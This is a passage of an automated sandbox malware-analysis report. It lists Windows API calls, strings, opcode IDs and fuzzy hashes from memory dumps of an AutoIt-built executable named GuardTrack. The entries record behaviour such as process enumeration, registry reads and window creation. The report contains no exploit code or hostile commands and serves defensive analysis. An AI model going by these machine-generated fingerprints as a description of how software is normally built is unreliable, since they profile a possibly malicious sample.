                                                          • GetVersionExW.KERNEL32(?), ref: 005C5D40
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • GetCurrentProcess.KERNEL32(?,00640A18,00000000,00000000,?), ref: 005C5E07
                                                          • IsWow64Process.KERNEL32(00000000), ref: 005C5E0E
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 005C5E54
                                                          • FreeLibrary.KERNEL32(00000000), ref: 005C5E5F
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 005C5E90
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 005C5E9C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: eae1cd81c460bf6a91e0e6bdf229d5f2845fd6d80f0c7862322fe418586ce711
                                                          • Instruction ID: 6a1f445362eb10303a00d5181a0bacc8fa67a89f4ed0a28f05c7f94b610f2056
                                                          • Opcode Fuzzy Hash: eae1cd81c460bf6a91e0e6bdf229d5f2845fd6d80f0c7862322fe418586ce711
                                                          • Instruction Fuzzy Hash: 1E91A431589BC0DED731CBE88450AABBFE57F66300B884A9ED0C797741E630B688D759
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0061416D
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0061417B
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0061419B
                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00614245
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3243318325-0
                                                          • Opcode ID: 8ba63e9989118575f2c7fcb2bfdae22f6987ef817c55fddfe48159721e948fdf
                                                          • Instruction ID: fb8d9395ada8f1411cdfdddc771cf20c7b34c282e8f8cc3294790eb7a5e79a9c
                                                          • Opcode Fuzzy Hash: 8ba63e9989118575f2c7fcb2bfdae22f6987ef817c55fddfe48159721e948fdf
                                                          • Instruction Fuzzy Hash: DB3130711083429FD304DFA0D885FAEBBE9BFD6350F54052DF585831A1EB719A89CB92
                                                          APIs
                                                            • Part of subcall function 005C3740: CharUpperBuffW.USER32(?,006771DC,00000001,?,00000000,006771DC,?,005B53A5,?,?,?,?), ref: 005C375D
                                                          • _memmove.LIBCMT ref: 005BB68A
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper_memmove
                                                          • String ID:
                                                          • API String ID: 2819905725-0
                                                          • Opcode ID: b7b87ba1d0a5747bbb0225795397981455c5ef335d81a5d434f2e5aca167465d
                                                          • Instruction ID: 671944914f9c269b12d782ab5a5b563cc4dfe7fd0e4ff5315b305e926928a5dc
                                                          • Opcode Fuzzy Hash: b7b87ba1d0a5747bbb0225795397981455c5ef335d81a5d434f2e5aca167465d
                                                          • Instruction Fuzzy Hash: 31A267706087419FE720DF18C484BAABBE1BF84304F14895DE99A8B362D7B5FD45CB92
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5ac5441697eccc35e2d7147e9d753e728ef45f732b51ae0dcd15b55dbedf17d
                                                          • Instruction ID: 68baf08aca8bdf1e31d671a887ce4cbff248e873bfde9058c68daa950a76c314
                                                          • Opcode Fuzzy Hash: d5ac5441697eccc35e2d7147e9d753e728ef45f732b51ae0dcd15b55dbedf17d
                                                          • Instruction Fuzzy Hash: 4E22BF7490421ADFDB24DF58C484AFEBBF0FF49300F24856AEA569B351D734A981CB91
                                                          APIs
                                                          • timeGetTime.WINMM ref: 005BBF57
                                                            • Part of subcall function 005B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B52E6
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 005F36B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessagePeekSleepTimetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                          • API String ID: 1792118007-922114024
                                                          • Opcode ID: ac5572a50d2ef3ff3f39979baa485e74a6aff6ceac4211f80a6d5b4795d67c93
                                                          • Instruction ID: d48248d2e72e5b4edb7789317eca87678b10ad7f5ee2b882fbb77af120e9a055
                                                          • Opcode Fuzzy Hash: ac5572a50d2ef3ff3f39979baa485e74a6aff6ceac4211f80a6d5b4795d67c93
                                                          • Instruction Fuzzy Hash: CDC29070608346DFE728DF24C848BAABFE5BF84304F14491DF58A972A1DBB5E944CB46
                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 005B3444
                                                          • RegisterClassExW.USER32(00000030), ref: 005B346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005B347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 005B349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005B34AC
                                                          • LoadIconW.USER32(000000A9), ref: 005B34C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005B34D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: ffda37eba85e4bbaf2edccb6fd9131fcf6dd079e3dd61b1186adf0c6ec33fea8
                                                          • Instruction ID: 9bffbbc032fdd48e2439409b60377ec1664c267cb5b3daaf35ba00369536ce86
                                                          • Opcode Fuzzy Hash: ffda37eba85e4bbaf2edccb6fd9131fcf6dd079e3dd61b1186adf0c6ec33fea8
                                                          • Instruction Fuzzy Hash: 99314975855319EFEB40CFA4EC88AC9BBF2FF09310F10512AE694E62A0E3B55581CF91
                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 005B3444
                                                          • RegisterClassExW.USER32(00000030), ref: 005B346E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005B347F
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 005B349C
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005B34AC
                                                          • LoadIconW.USER32(000000A9), ref: 005B34C2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005B34D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: d55320d9a201108909f19be15fba3e2f95be12873137a2fea3f463efdbbebef1
                                                          • Instruction ID: e5d8dc29dd80aa25b01bf5bcf6933bed3b792f14147264e97166f3629912b36c
                                                          • Opcode Fuzzy Hash: d55320d9a201108909f19be15fba3e2f95be12873137a2fea3f463efdbbebef1
                                                          • Instruction Fuzzy Hash: AE21E8B5955318AFEB00DF94EC48BDD7BF6FB09700F00511AFA15A62A0D7B11580CF92
                                                          APIs
                                                            • Part of subcall function 005D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,005C3094), ref: 005D00ED
                                                            • Part of subcall function 005D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,005C309F), ref: 005D08E3
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005C30E2
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006001BA
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006001FB
                                                          • RegCloseKey.ADVAPI32(?), ref: 00600239
                                                          • _wcscat.LIBCMT ref: 00600292
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: fece3bf502e44313e4d9f380e1d706063b04bd4f030048a0730bdf58080a680e
                                                          • Instruction ID: 19ead606af3ad87191654ab4ecb63dee60598d743e5cb5e187e179b4c0b0ec8f
                                                          • Opcode Fuzzy Hash: fece3bf502e44313e4d9f380e1d706063b04bd4f030048a0730bdf58080a680e
                                                          • Instruction Fuzzy Hash: 4A71A0714447029ED318EF65D849AABBFEAFF95341F40152EF459832A2EF308A84CB95
                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 005C5156
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 005C5165
                                                          • LoadIconW.USER32(00000063), ref: 005C517C
                                                          • LoadIconW.USER32(000000A4), ref: 005C518E
                                                          • LoadIconW.USER32(000000A2), ref: 005C51A0
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005C51C6
                                                          • RegisterClassExW.USER32(?), ref: 005C521C
                                                            • Part of subcall function 005B3411: GetSysColorBrush.USER32(0000000F), ref: 005B3444
                                                            • Part of subcall function 005B3411: RegisterClassExW.USER32(00000030), ref: 005B346E
                                                            • Part of subcall function 005B3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005B347F
                                                            • Part of subcall function 005B3411: InitCommonControlsEx.COMCTL32(?), ref: 005B349C
                                                            • Part of subcall function 005B3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005B34AC
                                                            • Part of subcall function 005B3411: LoadIconW.USER32(000000A9), ref: 005B34C2
                                                            • Part of subcall function 005B3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005B34D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: b4ddb98bd445c8a44bfbc0d59bbb517b514d1c8c97ef362719ecdd200d63fd08
                                                          • Instruction ID: a531862dc3512cd43d2276962f0be55b0314f69a857c0c3c881bfeb98b20e39c
                                                          • Opcode Fuzzy Hash: b4ddb98bd445c8a44bfbc0d59bbb517b514d1c8c97ef362719ecdd200d63fd08
                                                          • Instruction Fuzzy Hash: 87215E74D44318AFEB14DFA4ED09B9D7FB6FB08311F001229F628A62A1D7B55690CF84
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 005C4E22
                                                          • KillTimer.USER32(?,00000001), ref: 005C4E4C
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005C4E6F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005C4E7A
                                                          • CreatePopupMenu.USER32 ref: 005C4E8E
                                                          • PostQuitMessage.USER32(00000000), ref: 005C4EAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 666920220edc72d1c2cb84e3f6592b4f1bf6127cc758d93ddef47c355e76e0e0
                                                          • Instruction ID: 72c97a1eaaac043f5045f74c35b5dbfabcf19a9d230c8193711b8f9f2b857c68
                                                          • Opcode Fuzzy Hash: 666920220edc72d1c2cb84e3f6592b4f1bf6127cc758d93ddef47c355e76e0e0
                                                          • Instruction Fuzzy Hash: 7641263124860AAFEB195FA4DC2DFBA3E5BF741300F01152DF91696292CA71AC909F63
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005BADE1
                                                          • OleUninitialize.OLE32(?,00000000), ref: 005BAE80
                                                          • UnregisterHotKey.USER32(?), ref: 005BAFD7
                                                          • DestroyWindow.USER32(?), ref: 005F2F64
                                                          • FreeLibrary.KERNEL32(?), ref: 005F2FC9
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005F2FF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 59d18761b5b3ddb7263965967935b028611166cc6302b72812adf7eb7dbb3484
                                                          • Instruction ID: 858df7b14a909af65a9bca4d2b2fb95dc424dad8c056918ac5d9d55a3b96f72b
                                                          • Opcode Fuzzy Hash: 59d18761b5b3ddb7263965967935b028611166cc6302b72812adf7eb7dbb3484
                                                          • Instruction Fuzzy Hash: 3EA18C747012128FDB29EF54C499BB9FB65BF44700F1442AEE90AAB252DB31ED12CF91
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00600C5B
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • _memset.LIBCMT ref: 005C5787
                                                          • _wcscpy.LIBCMT ref: 005C57DB
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005C57EB
                                                          • __swprintf.LIBCMT ref: 00600CD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                          • String ID: Line %d: $AutoIt -
                                                          • API String ID: 230667853-4094128768
                                                          • Opcode ID: e63bafe20ddbbba403d97346e62b2ee390af67de2c5def6cdd599009b67a3fc6
                                                          • Instruction ID: 8329653f2bb445e335ff208e8b89bc9788076f040568b46a5e145178a21f6aad
                                                          • Opcode Fuzzy Hash: e63bafe20ddbbba403d97346e62b2ee390af67de2c5def6cdd599009b67a3fc6
                                                          • Instruction Fuzzy Hash: 0C41C671008701AED325EBA0DC49FDF7BEDBF85350F000A1EF195921A2EB70A689C796
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00617698
                                                            • Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
                                                            • Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031
                                                          • ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006176CF
                                                          • EnterCriticalSection.KERNEL32(?), ref: 006176EB
                                                          • _memmove.LIBCMT ref: 00617739
                                                          • _memmove.LIBCMT ref: 00617756
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00617765
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0061777A
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00617799
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: 07a4b8925eab960a27d6b5820dabcbbc861dd27e04e823d9ff081ce949fa3352
                                                          • Instruction ID: 584abfeda6012eb8f52ebafebada280d1d49637330c32083fb40b29888ed1764
                                                          • Opcode Fuzzy Hash: 07a4b8925eab960a27d6b5820dabcbbc861dd27e04e823d9ff081ce949fa3352
                                                          • Instruction Fuzzy Hash: E431A335904105EBDB10EF94DC89EAFBB79FF85300F2440A6F904AB286D7709E50DBA0
                                                          APIs
                                                            • Part of subcall function 005D07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D07EC
                                                            • Part of subcall function 005D07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 005D07F4
                                                            • Part of subcall function 005D07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D07FF
                                                            • Part of subcall function 005D07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D080A
                                                            • Part of subcall function 005D07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 005D0812
                                                            • Part of subcall function 005D07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 005D081A
                                                            • Part of subcall function 005CFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005BAC6B), ref: 005CFFA7
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005BAD08
                                                          • OleInitialize.OLE32(00000000), ref: 005BAD85
                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 005F2F56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ChangeCloseFindHandleInitializeMessageNotificationRegisterWindow
                                                          • String ID: <wg$\tg$sg
                                                          • API String ID: 2135498668-1723596592
                                                          • Opcode ID: fba5fc441b1374150f814e77baab1eceaef56ef7271f778c28e000f4fbd3b4c1
                                                          • Instruction ID: 684bacd6303cb70f50ddd513def7a1a601f88433727af959b622daa1ad56fe25
                                                          • Opcode Fuzzy Hash: fba5fc441b1374150f814e77baab1eceaef56ef7271f778c28e000f4fbd3b4c1
                                                          • Instruction Fuzzy Hash: BD81B7B09083418EC39CEF79AD88A197FEBFB99314710A56AE40DC727AEB704484CF54
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C5109
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C512A
                                                          • ShowWindow.USER32(00000000), ref: 005C513E
                                                          • ShowWindow.USER32(00000000), ref: 005C5147
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
